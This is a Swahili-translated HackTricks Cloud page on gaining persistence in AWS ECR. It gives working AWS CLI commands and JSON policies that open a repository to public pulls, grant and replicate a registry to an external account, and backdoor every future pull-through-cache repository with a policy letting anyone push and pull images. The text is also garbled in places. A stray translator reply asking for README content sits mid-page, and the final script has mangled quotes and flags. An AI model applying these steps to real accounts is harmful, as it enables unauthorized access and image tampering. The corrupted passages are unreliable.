HackTricks CloudAWS - ECR Persistence
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na đŹ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter đŚ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
ECR
Kwa taarifa zaidi angalia:
Hidden Docker Image with Malicious Code
Mshambulizi anaweza kupakia Docker image inayobeba malicious code kwenye ECR repository na kuitumia kudumisha persistence katika target AWS account. Mshambulizi anaweza kisha kupeleka image yenye malicious kwa huduma mbalimbali ndani ya account, kama Amazon ECS au EKS, kwa njia ya kuficha.
Repository Policy
Ongeza policy kwa repository moja ikikupa wewe (au kila mtu) access kwa repository:
aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json
# With a .json such as
{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}
Warning
Tambua kwamba ECR inahitaji watumiaji kuwa na idhini ya kuita API ya
ecr:GetAuthorizationTokenkupitia sera ya IAM kabla ya wao kuweza kuthibitisha kwenye registry na push au pull images yoyote kutoka kwenye Amazon ECR repository.
Sera ya Registry & Nakili Kati ya Akaunti
Inawezekana kunakili moja kwa moja registry katika akaunti ya nje kwa kusanidi cross-account replication, ambapo unahitaji kuonyesha akaunti ya nje unayotaka kunakili registry.
.png)
Kwanza, unahitaji kumpa akaunti ya nje ufikiaji wa registry kwa sera ya registry kama:
aws ecr put-registry-policy --policy-text file://my-policy.json
# With a .json like:
{
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}
I donât have the README.md content or the replication config. Please paste the README.md text and the replication config you want applied. I will then translate the relevant English to Swahili, preserving all markdown/html tags, links, paths and code as you requested.
aws ecr put-replication-configuration \
--replication-configuration file://replication-settings.json \
--region us-west-2
# Having the .json a content such as:
{
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
}
Repository Creation Templates (prefix backdoor for future repos)
Tumia vibaya ECR Repository Creation Templates ili ku-backdoor kwa otomatiki repository yoyote ambayo ECR huunda kwa auto chini ya prefix iliyodhibitiwa (kwa mfano kupitia Pull-Through Cache au Create-on-Push). Hii inatoa ufikiaji wa kudumu usioidhinishwa kwa repos za baadaye bila kugusa zile zilizopo.
- Ruhusa zinazohitajika: ecr:CreateRepositoryCreationTemplate, ecr:DescribeRepositoryCreationTemplates, ecr:UpdateRepositoryCreationTemplate, ecr:DeleteRepositoryCreationTemplate, ecr:SetRepositoryPolicy (used by the template), iam:PassRole (kama role maalum imeambatanishwa na template).
- Athari: Kila repository mpya inayoundwa chini ya prefix lengwa inarithi kwa otomatiki repository policy inayodhibitiwa na mshambuliaji (mfano, cross-account read/write), tag mutability, na scanning defaults.
Backdoor future PTC-created repos under a chosen prefix
```bash # Region REGION=us-east-11) Prepare permissive repository policy (example grants everyone RW)
cat > /tmp/repo_backdoor_policy.json <<âJSONâ { âVersionâ: â2012-10-17â, âStatementâ: [ { âSidâ: âBackdoorRWâ, âEffectâ: âAllowâ, âPrincipalâ: {âAWSâ: â*â}, âActionâ: [ âecr:BatchCheckLayerAvailabilityâ, âecr:BatchGetImageâ, âecr:GetDownloadUrlForLayerâ, âecr:InitiateLayerUploadâ, âecr:UploadLayerPartâ, âecr:CompleteLayerUploadâ, âecr:PutImageâ ] } ] } JSON
2) Create a Repository Creation Template for prefix âptc2â applied to PULL_THROUGH_CACHE
aws ecr create-repository-creation-template âregion $REGION âprefix ptc2 âapplied-for PULL_THROUGH_CACHE âimage-tag-mutability MUTABLE ârepository-policy file:///tmp/repo_backdoor_policy.json
3) Create a Pull-Through Cache rule that will auto-create repos under that prefix
This example caches from Amazon ECR Public namespace ânginxâ
aws ecr create-pull-through-cache-rule âregion $REGION âecr-repository-prefix ptc2 âupstream-registry ecr-public âupstream-registry-url public.ecr.aws âupstream-repository-prefix nginx
4) Trigger auto-creation by pulling a new path once (creates repo ptc2/nginx)
acct=$(aws sts get-caller-identity âquery Account âoutput text) aws ecr get-login-password âregion $REGION | docker login âusername AWS âpassword-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com
docker pull ${acct}.dkr.ecr.${REGION}.amazonaws.com/ptc2/nginx:latest
5) Validate the backdoor policy was applied on the newly created repository
aws ecr get-repository-policy âregion $REGION ârepository-name ptc2/nginx âquery policyText âoutput text | jq .
</details>
> [!TIP]
> Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Jifunze na fanya mazoezi ya Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** đŹ [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** đŚ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
>
> </details>